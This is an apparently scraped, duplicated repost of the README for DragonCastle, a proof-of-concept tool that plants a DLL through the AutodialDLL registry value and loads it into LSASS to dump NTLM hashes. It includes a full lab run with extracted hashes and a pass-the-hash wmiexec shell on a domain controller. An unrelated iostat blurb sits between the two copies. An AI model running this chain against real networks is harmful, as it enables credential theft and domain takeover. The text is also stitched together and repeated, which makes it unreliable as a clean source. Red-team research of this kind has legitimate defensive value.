Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.

The DLLMain always returns False so the processes doesn't keep it.

Caveats

It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -h                                                                                                                                            
		DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        valid username
  -p PASSWORD, --password PASSWORD
                        valid password (if omitted, it will be asked unless -no-pass)
  -d DOMAIN, --domain DOMAIN
                        valid doma   in name
  -hashes [LMHASH]:NTHASH
                        NT/LM hashes (LM hash can be empty)
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
  -local-dll dll to plant
                        DLL location (local) that will be planted on target
  -remote-dll dll location
                        Path used to update AutodialDLL registry value</   pre>

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
		DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

		============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977   b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: 
Domain: 
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: 
Domain: 

		============
[+] Deleting DLL

[^] Have a nice day!

psyconauta@insulanova:~/Research/dragoncastle|⇒  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                            Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivile   ge                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               En   able computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel Fernández (@TheXC3LL)

References

• https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/
• https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
• https://adepts.of0x.cc/physical-graffiti-lsass/
• https://blog.xpnsec.com/exploring-mimikatz-part-2/

About Linux iostat command. The Linux iostat command is used for monitoring system enter/output machine loading by observing the time the gadgets are actions associated with their common switch charges. The Linux iostat command ...

Read more

The post Linux Lostat Command appeared first on HackNos.

A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.

The DLLMain always returns False so the processes doesn't keep it.

Caveats

It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -h                                                                                                                                            
		DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        valid username
  -p PASSWORD, --password PASSWORD
                        valid password (if omitted, it will be asked unless -no-pass)
  -d DOMAIN, --domain DOMAIN
                        valid doma   in name
  -hashes [LMHASH]:NTHASH
                        NT/LM hashes (LM hash can be empty)
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
  -local-dll dll to plant
                        DLL location (local) that will be planted on target
  -remote-dll dll location
                        Path used to update AutodialDLL registry value</   pre>

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
		DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

		============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977   b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: 
Domain: 
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: 
Domain: 

		============
[+] Deleting DLL

[^] Have a nice day!

psyconauta@insulanova:~/Research/dragoncastle|⇒  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                            Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivile   ge                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               En   able computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel Fernández (@TheXC3LL)

References

• https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/
• https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
• https://adepts.of0x.cc/physical-graffiti-lsass/
• https://blog.xpnsec.com/exploring-mimikatz-part-2/